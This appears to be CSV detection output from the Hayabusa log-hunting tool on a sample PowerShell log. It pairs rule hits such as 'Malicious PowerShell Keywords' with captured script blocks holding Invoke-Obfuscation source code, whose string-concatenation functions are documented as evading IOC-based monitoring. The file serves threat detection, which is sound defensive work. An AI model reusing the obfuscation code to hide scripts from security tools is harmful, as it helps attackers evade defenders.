$MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace 